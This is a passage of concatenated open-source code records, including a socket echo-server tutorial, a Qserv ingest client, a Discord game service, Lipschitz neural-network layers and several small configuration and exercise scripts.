NGAW_FLAG: Don't change it here, override it in the velocity\n # model config file using a 'CODEBASE_SDSU_NGAW_FLAG = XXX' line\n # 1: NGA-WEST1\n # 2: NGA-WEST2\n self.NGAW_FLAG = 2\n self.KAPPA = 0.04\n self.Q_CODA = 150.0\n self.FDEC = 0.8\n self.AFAC = 41.0\n self.BFAC = 34.0\n self.SOURCE_MECH = \"rs\"\n self.SOURCE_FUNC = \"dreg\"\n self.VERBOSE = \"on\"\n self.TR_SCA = 0.075\n self.STR_FAC = 50.e6\n\n # 06/10/11: Sandarsh MK\n # Note: Setting FMAX = 20.00 Hz will\n # cause BBtoolbox to produce NaNs in 000 and 090 seismograms.\n self.FMAX = 100.00\n\n # 09/22/2020: Correlation flag\n # 0: Do not include correlation\n # 1: Include only inter-frequency correlation\n # 2: Include spatial correlation\n self.corr_flag = 0\n\nif __name__ == \"__main__\":\n BBCODA2 = BBToolboxCfg()\n print(\"Created Test Config Class: %s\" % (os.path.basename(sys.argv[0])))\n","repo_name":"SCECcode/bbp","sub_path":"bbp/comps/bbtoolbox_cfg.py","file_name":"bbtoolbox_cfg.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"21028207231","text":"# 创建服务器用到的模块\nimport socketserver\n\n\nclass MySelfServer(socketserver.BaseRequestHandler): # 第一步创建一个自己的server类,继承BaseRequestHandler类\n\n # 重写BaseRequestHandler类中的handle方法,直接写在自己创建的类中就可以了\n def handle(self): # 里面的内容为服务器端跟客户端的所有交互\n while True:\n\n # 接收数据\n self.data = self.request.recv(1024).strip()\n\n # 打印客户端ip地址和发送来的数据,这里可能会问为什么会有self.client_address这个参数,这个在父类构造函数中\n print(\"{} wrote:\".format(self.client_address[0]))\n print(self.data)\n\n # 判断客户端是否断开\n if not self.data:\n print(self.client_address, '的链接断开了!') # 等待接收但接收为空则客户端断开\n break\n\n # 将接收到的数据大写发送回去\n self.request.sendall(self.data.upper())\n\n\nif __name__ == \"__main__\":\n HOST, PORT = \"\", 9999\n\n # 第二步实例化四个类其中之一并传入服务器地址和上面自己创建的服务器类,这里自己实例化的TCPServer\n server = socketserver.ThreadingTCPServer((HOST, PORT), MySelfServer)\n\n # 处理多个请求,这里注意的是虽然是处理多个请求,但是这句话并没有实现并发\n server.serve_forever()","repo_name":"neodeng23/python_tcp_socket","sub_path":"socketserver_demo/mult_server.py","file_name":"mult_server.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40711862648","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\n@dataclass\nclass FileEncryptionInfo(AdditionalDataHolder, BackedModel, Parsable):\n \"\"\"\n Contains properties for file encryption information for the content version of a line of business app.\n \"\"\"\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The key used to encrypt the file content.\n encryption_key: Optional[bytes] = None\n # The file digest prior to encryption. ProfileVersion1 requires a non-null FileDigest.\n file_digest: Optional[bytes] = None\n # The file digest algorithm. ProfileVersion1 currently only supports SHA256 for the FileDigestAlgorithm.\n file_digest_algorithm: Optional[str] = None\n # The initialization vector (IV) used for the encryption algorithm. Must be 16 bytes.\n initialization_vector: Optional[bytes] = None\n # The hash of the concatenation of the IV and encrypted file content. Must be 32 bytes.\n mac: Optional[bytes] = None\n # The key used to compute the message authentication code of the concatenation of the IV and encrypted file content. Must be 32 bytes.\n mac_key: Optional[bytes] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # The profile identifier. Maps to the strategy used to encrypt the file. Currently, only ProfileVersion1 is supported.\n profile_identifier: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> FileEncryptionInfo:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: FileEncryptionInfo\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return FileEncryptionInfo()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n fields: Dict[str, Callable[[Any], None]] = {\n \"encryptionKey\": lambda n : setattr(self, 'encryption_key', n.get_bytes_value()),\n \"fileDigest\": lambda n : setattr(self, 'file_digest', n.get_bytes_value()),\n \"fileDigestAlgorithm\": lambda n : setattr(self, 'file_digest_algorithm', n.get_str_value()),\n \"initializationVector\": lambda n : setattr(self, 'initialization_vector', n.get_bytes_value()),\n \"mac\": lambda n : setattr(self, 'mac', n.get_bytes_value()),\n \"macKey\": lambda n : setattr(self, 'mac_key', n.get_bytes_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"profileIdentifier\": lambda n : setattr(self, 'profile_identifier', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_bytes_value(\"encryptionKey\", self.encryption_key)\n writer.write_bytes_value(\"fileDigest\", self.file_digest)\n writer.write_str_value(\"fileDigestAlgorithm\", self.file_digest_algorithm)\n writer.write_bytes_value(\"initializationVector\", self.initialization_vector)\n writer.write_bytes_value(\"mac\", self.mac)\n writer.write_bytes_value(\"macKey\", self.mac_key)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_str_value(\"profileIdentifier\", self.profile_identifier)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/file_encryption_info.py","file_name":"file_encryption_info.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"34720681201","text":"import pandas as pd\nfrom sklearn import datasets\n\n\ndef get():\n \"\"\"Get training data\"\"\"\n d = datasets.load_iris()\n df = pd.DataFrame(d[\"data\"])\n\n df.columns = d[\"feature_names\"]\n df[\"target\"] = d[\"target\"]\n return df\n","repo_name":"ploomber/soopervisor","sub_path":"tests/assets/my_project/src/my_project/tasks/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"13175462451","text":"from graphcast.graphcast import ModelConfig, TaskConfig, GraphCast\nfrom fmbase.util.config import cfg\ndef config_model( **kwargs ) -> ModelConfig:\n\tmc = ModelConfig()\n\tmc.resolution= kwargs.get('resolution', cfg().model.resolution),\n\tmc.mesh_size= kwargs.get('mesh_size', cfg().model.mesh_size),\n\tmc.latent_size= kwargs.get('latent_size', cfg().model.latent_size),\n\tmc.gnn_msg_steps= kwargs.get('gnn_msg_steps', cfg().model.gnn_msg_steps),\n\tmc.hidden_layers= kwargs.get('hidden_layers', cfg().model.hidden_layers),\n\tmc.radius_query_fraction_edge_length= kwargs.get('radius_query_fraction_edge_length', cfg().model.radius_query_fraction_edge_length)\n\treturn mc\n\ndef config_task( **kwargs) -> TaskConfig:\n\tdts = cfg().task.data_timestep\n\ttc = TaskConfig()\n\ttc.input_variables= kwargs.get('input_variables', cfg().task.input_variables)\n\ttc.target_variables= kwargs.get('target_variables', cfg().task.target_variables)\n\ttc.forcing_variables= kwargs.get('forcing_variables', cfg().task.forcing_variables)\n\ttc.pressure_levels= kwargs.get('z_levels', cfg().task.z_levels)\n\ttc.input_duration= kwargs.get('input_duration', f\"{cfg().task.input_steps*dts}h\" )\n\treturn tc","repo_name":"nasa-nccs-hpda/FMGraphcast","sub_path":"fmgraphcast/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19305383343","text":"import logging\nimport posixpath\nimport socket\nimport sys\nimport urllib.parse\n\n# -------------------------------\n# Imports of standard modules --\n# -------------------------------\nfrom functools import lru_cache\nfrom typing import Any, Dict, List, Tuple\n\n# ----------------------------\n# Imports for other modules --\n# ----------------------------\nfrom . import jsonparser, util, version\nfrom .exception import IngestError\nfrom .http import DEFAULT_AUTH_PATH, Http, get_fqdn\nfrom .ingestconfig import IngestServiceConfig\n\n# ---------------------------------\n# Local non-exported definitions --\n# ---------------------------------\n\n\n_LOG = logging.getLogger(__name__)\n\n\nclass ReplicationClient:\n \"\"\"Client for the Qserv ingest/replication service.\n Use chunk metadata and connection to concurrent queue manager\n \"\"\"\n\n def __init__(\n self, repl_url: str, timeout_read_sec: int, timeout_write_sec: int, auth_path: str = DEFAULT_AUTH_PATH\n ) -> None:\n\n self.repl_url = util.trailing_slash(repl_url)\n self.http = Http(timeout_read_sec, timeout_write_sec, auth_path)\n self._check_version()\n self.index_url = urllib.parse.urljoin(self.repl_url, \"replication/sql/index\")\n\n def abort_all_transactions(self, database: str) -> None:\n \"\"\"Abort all started transactions for a given database.\"\"\"\n for transaction_id in self.get_transactions_inprogress(database):\n success = False\n self.close_transaction(database, transaction_id, success)\n _LOG.info(\"Abort transaction: %s\", transaction_id)\n\n def build_secondary_index(self, database: str) -> None:\n url = urllib.parse.urljoin(self.repl_url, \"ingest/index/secondary\")\n _LOG.info(\"Create secondary index\")\n payload = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"database\": database,\n \"allow_for_published\": 1,\n \"local\": 1,\n \"rebuild\": 1,\n }\n self.http.post(url, payload)\n\n def close_transaction(self, database: str, transaction_id: int, success: bool) -> None:\n \"\"\"Close or abort a transaction.\"\"\"\n tmp_url = posixpath.join(\"ingest/trans/\", str(transaction_id))\n if success is True:\n tmp_url += \"?abort=0\"\n else:\n tmp_url += \"?abort=1\"\n url = urllib.parse.urljoin(self.repl_url, tmp_url)\n _LOG.debug(\"Attempt to close transaction (PUT %s)\", url)\n responseJson = self.http.put(url, payload=None, no_readtimeout=True)\n\n # TODO Check if there is only one transaction in responseJson in\n # order to remove 'database' parameter\n for trans in responseJson[\"databases\"][database][\"transactions\"]:\n _LOG.debug(\"Close transaction (id: %s state: %s)\", trans[\"id\"], trans[\"state\"])\n\n def _check_version(self) -> None:\n \"\"\"Check replication service version and exit if it is not\n the expected one\n \"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"meta/version\")\n responseJson = self.http.get(url)\n if responseJson[\"version\"] != version.REPL_SERVICE_VERSION:\n _LOG.critical(\n \"Invalid replication server version (is %s, expected %s)\",\n responseJson[\"version\"],\n version.REPL_SERVICE_VERSION,\n )\n sys.exit(1)\n _LOG.info(\"Replication service version: v%s\", version.REPL_SERVICE_VERSION)\n\n def database_config(self, database: str, ingest_service_config: IngestServiceConfig) -> None:\n \"\"\"Set replication system configuration for a given database https://co\n nfluence.lsstcorp.org/display/DM/Ingest%3A+11.1.8.1.+Setting+configurat\n ion+parameters.\n\n Parameters\n ----------\n database: `str`\n Database name\n replication_config: `util.IngestServiceConfig`\n Configuration parameters for the database inside\n replication/ingest system\n\n \"\"\"\n json = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"database\": database,\n \"CAINFO\": ingest_service_config.cainfo,\n \"SSL_VERIFYPEER\": ingest_service_config.ssl_verifypeer,\n }\n\n if ingest_service_config.async_proc_limit is not None:\n json[\"ASYNC_PROC_LIMIT\"] = ingest_service_config.async_proc_limit\n if ingest_service_config.async_proc_limit is not None:\n json[\"LOW_SPEED_LIMIT\"] = ingest_service_config.low_speed_limit\n if ingest_service_config.async_proc_limit is not None:\n json[\"LOW_SPEED_TIME\"] = ingest_service_config.low_speed_time\n\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/config/\")\n _LOG.debug(\"Configure database inside replication system, url: %s, json: %s\", url, json)\n self.http.put(url, json)\n\n def database_publish(self, database: str) -> None:\n \"\"\"Publish a database inside replication system.\"\"\"\n path = \"/ingest/database/{}\".format(database)\n url = urllib.parse.urljoin(self.repl_url, path)\n _LOG.debug(\"Publish database: %s\", url)\n self.http.put(url, no_readtimeout=True)\n\n def database_register(self, json_db: Dict) -> None:\n \"\"\"Register a database inside replication system using\n data_url/.json as input data.\"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/database/\")\n payload = json_db\n _LOG.debug(\"Starting a database registration request: %s with %s\", url, payload)\n self.http.post_retry(url, payload)\n\n def database_register_tables(self, tables_json_data: List[Dict], felis: Dict = None) -> None:\n \"\"\"Register a database inside replication system using\n data_url/.json as input data.\"\"\"\n if felis is not None:\n _LOG.info(\"Load Felis schema for tables %s\", felis.keys())\n\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/table/\")\n\n if _LOG.isEnabledFor(logging.DEBUG):\n _LOG.debug(\"Ordered list of table to register\")\n for json_data in tables_json_data:\n _LOG.debug(\" %s\", json_data[\"table\"])\n\n for json_data in tables_json_data:\n if felis is not None and json_data[\"table\"] in felis:\n schema = felis[json_data[\"table\"]]\n json_data[\"schema\"] = schema + json_data[\"schema\"]\n _LOG.debug(\"Start a table registration request: %s with %s\", url, json_data)\n self.http.post_retry(url, json_data)\n\n def get_database_status(self, database: str, family: str) -> jsonparser.DatabaseStatus:\n url = urllib.parse.urljoin(self.repl_url, \"replication/config\")\n responseJson = self.http.get(url)\n status = jsonparser.parse_database_status(responseJson, database, family)\n _LOG.debug(f\"Database {family}:{database} status: {status}\")\n return status\n\n # FIXME this might use a lot of memory\n @lru_cache(maxsize=128)\n def get_chunk_location(self, chunk_id: int, database: str) -> Tuple[str, int]:\n \"\"\"Get the location of a chunk for a given database.\n\n Parameters\n ----------\n chunk : `str`\n Chunk id.\n database : `str`\n Database name.\n\n Returns\n -------\n x : `str`\n Hostname of the qserv worker which store the chunk\n y : `int`\n Port number of the of replication service on\n the qserv worker which store the chunk\n\n \"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"ingest/chunk\")\n payload = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"chunk\": chunk_id,\n \"database\": database,\n }\n responseJson = Http().post_retry(url, payload)\n\n fqdns, port = jsonparser.get_chunk_location(responseJson)\n host = get_fqdn(fqdns, port)\n if not host:\n raise IngestError(f\"Unable to find a valid worker fqdn in json response {responseJson}\")\n _LOG.info(\"Location for chunk %d: %s:%d\", chunk_id, host, port)\n\n return (host, port)\n\n @lru_cache(maxsize=1)\n def get_regular_tables_locations(self, database: str) -> List[Tuple[str, int]]:\n \"\"\"Returns connection parameters of the Data Ingest Service of workers\n which are available for ingesting regular (fully replicated) tables.\n\n Parameters\n ----------\n database : `str`\n Database name.\n\n Returns\n -------\n x : `str`\n Hostname of the qserv worker which store the chunk\n y : `int`\n Port number of the of replication service on\n the qserv worker which store the chunk\n\n \"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"ingest/regular\")\n payload = {\"database\": database}\n responseJson = Http().get(url, payload)\n\n sanitized_locations: List[Tuple[str, int]] = []\n locations = jsonparser.get_regular_table_locations(responseJson)\n for (fqdns, port) in locations:\n fqdn = get_fqdn(fqdns, port)\n if not fqdn:\n raise IngestError(f\"Unable to find a valid worker fqdn in json response {responseJson}\")\n sanitized_locations.append((fqdn, port))\n\n _LOG.info(\"Locations for regular tables for database %s: %s\", database, locations)\n\n return sanitized_locations\n\n def _get_transactions(self, states: List[jsonparser.TransactionState], database: str) -> List[int]:\n \"\"\"Return transactions ids.\"\"\"\n url = urllib.parse.urljoin(self.repl_url, \"ingest/trans?database=\" + database)\n responseJson = self.http.get(url)\n transaction_ids = jsonparser.filter_transactions(responseJson, database, states)\n\n return transaction_ids\n\n def get_transactions_inprogress(self, database: str) -> List[int]:\n \"\"\"Get transaction in progress (i.e. not in FINISHED, ABORTED state)\n for a given database\n\n Parameters\n ----------\n database : str\n target database\n\n Returns\n -------\n List[int]\n List of transactions\n \"\"\"\n\n states = [\n jsonparser.TransactionState.ABORT_FAILED,\n jsonparser.TransactionState.FINISH_FAILED,\n jsonparser.TransactionState.IS_ABORTING,\n jsonparser.TransactionState.IS_FINISHING,\n jsonparser.TransactionState.IS_STARTING,\n jsonparser.TransactionState.STARTED,\n jsonparser.TransactionState.START_FAILED,\n ]\n trans = self._get_transactions(states, database)\n _LOG.debug(f\"IDs of transactions not in FINISHED, ABORTED state: {trans} for {database} database.\")\n return trans\n\n def index_all_tables(self, json_indexes: List[Dict[str, Any]]) -> None:\n for json_idx in json_indexes:\n _LOG.info(f\"Create index: {json_idx}\")\n self.http.post(self.index_url, json_idx)\n\n def start_transaction(self, database: str) -> int:\n url = urllib.parse.urljoin(self.repl_url, \"ingest/trans\")\n payload = {\n \"version\": version.REPL_SERVICE_VERSION,\n \"database\": database,\n \"context\": {\"pod\": socket.gethostname()},\n }\n responseJson = self.http.post_retry(url, payload)\n\n # For catching the super transaction ID\n # Want to print\n # responseJson[\"databases\"][][\"transactions\"]\n current_db = responseJson[\"databases\"][database]\n transaction_id = int(current_db[\"transactions\"][0][\"id\"])\n _LOG.debug(\"transaction ID: %i\", transaction_id)\n return transaction_id\n\n def deploy_statistics(self, database: str, table_names: List[str]) -> None:\n \"\"\"Collect row counters in the specified tables and deploy the\n statistics in Qserv to allow optimizations of the relevant queries.\n See:\n - https://confluence.lsstcorp.org/display/DM/3.+Managing+statistics+for+the+row+counters+optimizations # noqa: W505, E501\n - https://confluence.lsstcorp.org/display/DM/1.+Collecting+row+counters+and+deploying+them+at+Qserv\n\n Parameters\n ----------\n database : `str`\n Database name.\n table_names: `str`\n Names of processed tables\n\n Raises\n ------\n ReplicationControllerError\n Raised in case of error in JSON response\n for a non-retriable request\n \"\"\"\n\n url = urllib.parse.urljoin(self.repl_url, \"/ingest/table-stats/\")\n\n # TODO Check parameters with Igor\n payload = {\n \"database\": database,\n \"overlap_selector\": \"CHUNK_AND_OVERLAP\",\n \"force_rescan\": 1,\n \"row_counters_state_update_policy\": \"ENABLED\",\n \"row_counters_deploy_at_qserv\": 1,\n }\n\n for table in table_names:\n _LOG.debug(\"Start a table statistics deployment request: %s with %s\", url, table)\n payload[\"table\"] = table\n self.http.post_retry(url, payload, auth=True, no_readtimeout=True)\n","repo_name":"lsst-dm/qserv-ingest","sub_path":"rootfs/ingest/python/qserv/replicationclient.py","file_name":"replicationclient.py","file_ext":"py","file_size_in_byte":13078,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"23183841420","text":"from discord import ApplicationContext, Interaction, Message, InteractionResponse\nfrom discord.ui import View\n\nfrom embeds.boss_event.battle_embed import BattleEmbed\nfrom embeds.boss_event.hero_embed import HeroStatsEmbed\nfrom embeds.boss_event.hit_embed import HitEmbed\nfrom embeds.boss_event.inventory_embed import HeroInventoryEmbed\nfrom embeds.def_embed import DefaultEmbed\nfrom embeds.view.buttons import buttons\nfrom embeds.view.fight_view import FightView\nfrom embeds.view.inventory_view import InventoryView\nfrom embeds.view.profile_view import ProfileView\nfrom systems.boss_event_system.battle_system import battle_system\nfrom systems.boss_event_system.hero_system import hero_system\n\n\nclass GameService:\n def __init__(self, client):\n self.client = client\n\n async def boss(self, interaction: Interaction, ctx: ApplicationContext = None):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n battle = battle_system.get_current_battle()\n\n async def attack_callback(interact: Interaction):\n fight_view.disable_attack(battle.is_over())\n await self.attack_enemy(interact, ctx)\n\n async def profile_callback(interact: Interaction):\n await self.profile(interact, ctx)\n\n fight_view = FightView(attack_callback, profile_callback)\n fight_view.disable_attack(battle.is_over())\n\n if interaction.message is None:\n await interaction.response.send_message(embed=BattleEmbed(battle, interaction.user.id),\n view=fight_view, ephemeral=True)\n else:\n await interaction.response.edit_message(embed=BattleEmbed(battle, interaction.user.id),\n view=fight_view)\n\n async def profile(self, interaction: Interaction, ctx: ApplicationContext = None):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n\n async def inventory_callback(interact: Interaction):\n await self.inventory(interact, ctx) # inventory command update view by yourself\n\n async def back_callback(interact: Interaction):\n await self.boss(interact, ctx)\n\n profile_view = ProfileView(back_callback, inventory_callback)\n\n if interaction.message is None:\n await interaction.response.send_message(embed=HeroStatsEmbed(hero), view=profile_view, ephemeral=True)\n else:\n print(interaction.message.to_message_reference_dict())\n await interaction.response.edit_message(embed=HeroStatsEmbed(hero), view=profile_view)\n\n async def inventory(self, interaction: Interaction, ctx: ApplicationContext = None, index: int = 1):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n inventory = hero.inventory\n\n index = len(inventory.items) if index < 1 else 1 if index > len(inventory.items) else index\n\n async def back_callback(interact: Interaction):\n await self.profile(interact, ctx)\n\n async def up_callback(interact: Interaction):\n await self.inventory(interact, ctx, index - 1)\n\n async def down_callback(interact: Interaction):\n await self.inventory(interact, ctx, index + 1)\n\n async def equip_callback(interact: Interaction):\n await self.equip(interact, ctx, index)\n\n async def remove_item_callback(interact: Interaction):\n await self.remove_item(interact, ctx, index)\n\n inventory_view = InventoryView(back_callback, up_callback, down_callback, equip_callback, remove_item_callback)\n\n if interaction.message is None:\n await interaction.response.send_message(embed=HeroInventoryEmbed(hero, index),\n view=inventory_view, ephemeral=True)\n else:\n await interaction.response.edit_message(embed=HeroInventoryEmbed(hero, index),\n view=inventory_view)\n\n async def attack_enemy(self, interaction: Interaction, ctx: ApplicationContext = None):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n if hero.is_dead():\n # todo create better embed for displaying dead hero\n await interaction.response.send_message(embed=DefaultEmbed(f'***```You cant attack being dead !!!```***'),\n delete_after=3,\n ephemeral=True)\n return\n\n battle = battle_system.get_current_battle()\n\n if not battle.fight_with(hero):\n await interaction.response.send_message(embed=DefaultEmbed(description=\"***```Boss already dead```***\"),\n delete_after=3,\n ephemeral=True)\n return\n\n battle_system.update_current_battle(battle)\n hero_system.health_change(hero)\n\n if interaction.message is None:\n await interaction.channel.send(embed=HitEmbed(battle, hero))\n else:\n await interaction.response.edit_message(embed=HitEmbed(battle, hero))\n\n await self.boss(interaction, ctx)\n\n async def equip(self, interaction: Interaction, ctx: ApplicationContext = None, index: int = 1):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n item_by_index = hero.inventory.item_by_index(index)\n\n if item_by_index is not None:\n hero.inventory.equip(item_by_index)\n hero_system.modify_inventory(hero)\n\n if interaction.message is None:\n await interaction.response.send_message(embed=HeroInventoryEmbed(hero, index), ephemeral=True)\n else:\n await interaction.response.edit_message(embed=HeroInventoryEmbed(hero, index))\n\n async def remove_item(self, interaction: Interaction, ctx: ApplicationContext = None, index: int = 1):\n if ctx is None:\n ctx = await self.client.get_application_context(interaction)\n\n hero = hero_system.get_hero_by_user(ctx.user)\n\n hero.inventory.remove_item(index)\n hero_system.modify_inventory(hero)\n\n if interaction.message is None:\n await interaction.response.send_message(embed=HeroInventoryEmbed(hero, index), ephemeral=True)\n else:\n await interaction.response.edit_message(embed=HeroInventoryEmbed(hero, index))\n","repo_name":"BladeXses21/DesireBot_v4","sub_path":"main/src/game_event/service/game_service.py","file_name":"game_service.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35281941715","text":"import random\nfrom utils import *\nfrom config import *\n\n\ndef main():\n object_list = get_questions_from_url(QUESTIONS_PATH)\n questions = create_questions_list(object_list)\n\n if questions[0] == \"Error\":\n print(\"Ошибка получения данных! Обратитесь к программисту!\")\n return\n\n count_questions = len(questions) - 1\n answered_questions = 0\n\n print(\"Игра начинается!\")\n print()\n\n while answered_questions <= count_questions:\n question = questions[random.randint(0, count_questions)]\n\n if question.answered:\n continue\n\n print(question.build_question())\n\n question.user_answer = input()\n\n print(question.build_feedback())\n\n question.answered = not question.answered\n\n answered_questions += 1\n\n print_stats(questions)\n\n\nmain()\n","repo_name":"andrei1998Front/python_course","sub_path":"1_course/homework_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30753716761","text":"\"\"\"\nAlmost Orthogonal Lipschitz (AOL) layer.\nProposed in https://arxiv.org/abs/2208.03160\nCode adapted from\n\"1-Lipschitz Layers Compared: Memory, Speed, and Certifiable Robustness\", 2023.\n\"\"\"\n\nfrom typing import Optional, Callable, Union\n\nfrom torch import nn, Tensor\nimport torch\nfrom torch.nn.common_types import _size_2_t\nfrom torch.nn.utils.parametrize import register_parametrization\n\n\ndef aol_conv2d_rescaling(weight: Tensor) -> Tensor:\n \"\"\" Expected weight shape: out_channels x in_channels x ks1 x ks_2 \"\"\"\n _, _, k1, k2 = weight.shape\n weight_tp = weight.transpose(0, 1)\n v = torch.nn.functional.conv2d(\n weight_tp, weight_tp, padding=(k1 - 1, k2 - 1))\n v_scaled = v.abs().sum(dim=(1, 2, 3), keepdim=True).transpose(0, 1)\n return weight / (v_scaled + 1e-6).sqrt()\n\n\ndef aol_linear_rescaling(weight: Tensor) -> Tensor: # shape: out x in\n wwt = torch.matmul(weight.transpose(0, 1), weight) # shape: in x in\n ls_bounds_squared = wwt.abs().sum(dim=0, keepdim=True) # shape: 1 x in\n return weight / (ls_bounds_squared + 1e-6).sqrt() # shape: out x in\n\n\nclass AOLConv2dRescaling(nn.Module):\n def forward(self, weight: Tensor) -> Tensor:\n return aol_conv2d_rescaling(weight)\n\n\nclass AOLLinearRescaling(nn.Module):\n def forward(self, weight: Tensor) -> Tensor:\n return aol_linear_rescaling(weight)\n\n\nclass AOLConv2d(nn.Conv2d):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: _size_2_t,\n initializer: Optional[Callable] = None,\n padding: Union[_size_2_t, str] = 'same',\n padding_mode: str = 'circular',\n **kwargs) -> None:\n super().__init__(in_channels, out_channels, kernel_size,\n padding=padding, padding_mode=padding_mode, **kwargs)\n\n if initializer is None:\n initializer = nn.init.dirac_\n initializer(self.weight)\n\n torch.nn.init.zeros_(self.bias)\n\n register_parametrization(self, 'weight', AOLConv2dRescaling())\n\n\nclass AOLConv2dOrthogonal(AOLConv2d):\n \"\"\" Alias for AOLConv2d with orthogonal initialization. \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args,\n initializer=torch.nn.init.orthogonal_,\n **kwargs)\n\n\nclass AOLLinear(nn.Linear):\n def __init__(self,\n in_features: int,\n out_features: int,\n initializer: Optional[Callable] = None,\n **kwargs) -> None:\n super().__init__(in_features, out_features, **kwargs)\n\n if initializer is None:\n initializer = nn.init.eye_\n initializer(self.weight)\n\n torch.nn.init.zeros_(self.bias)\n\n register_parametrization(self, 'weight', AOLLinearRescaling())\n\n\nclass AOLLinearOrthogonal(AOLLinear):\n \"\"\" Alias for AOLLinear with orthogonal initialization. \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args,\n initializer=torch.nn.init.orthogonal_,\n **kwargs)\n","repo_name":"berndprach/NActivation","sub_path":"src/models/layers/lipschitz/aol.py","file_name":"aol.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39108918549","text":"a = [1, 56, 58, 57, 90, 92, 94, 93, 91, 45]\n\ndef sort_array(a):\n for i in range(0,len(a)):\n for j in range(i+1,len(a)):\n if a[i] > a[j]:\n a[i],a[j] = a[j],a[i]\n return(a)\n\ndef sub_array(a,start):\n count = 1\n i = 0\n for i in range(start,len(a)):\n if (i + 1) < len(a) and a[i+1] == a[i] + 1 :\n count += 1\n else :\n break\n return(i, count)\n\ndef largest_contagious(a):\n a = sort_array(a)\n\n # print (\"sorted array - \" + str(a))\n largest_count = 1\n j = -1\n i = 0\n while j+1 < len(a):\n i = j + 1\n # print(\"count starting at position - \" + str(i))\n j,count = sub_array(a,i)\n # print(\"count ending at position - \" + str(j))\n\n if count > largest_count:\n largest_count = count\n # print(\"largest contagious subarray length - \" + str(largest_count))\n print(\"final largest count - \" + str(largest_count))\n\nlargest_contagious(a)","repo_name":"subiditachaki/Learning_Projects","sub_path":"Learning_Python/Strings/largest contagious subarray.py","file_name":"largest contagious subarray.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28203647791","text":"#!/usr/bin/env python3\n\nimport sys\nimport numpy as np\nfrom pwtools import io, mpl, common, crys\n\nnpt_txt = \"\"\"\nfix fix_npt all npt temp 3000 3000 0.01 tri 0 0 0.3 tchain 4 pchain 4 &\n mtk yes scaleyz no scalexz no scalexy no flip no\n\"\"\"\n\nnvt_txt = \"\"\"\nfix fix_nvt all nvt temp 3000 3000 0.01 tchain 4 &\n mtk yes scaleyz no scalexz no scalexy no flip no\n\"\"\"\n\nlmp_in_templ = \"\"\"\nclear\nunits metal\nboundary p p p\natom_style atomic\n\nread_data lmp.struct\n\n### interactions\npair_style tersoff\npair_coeff * * 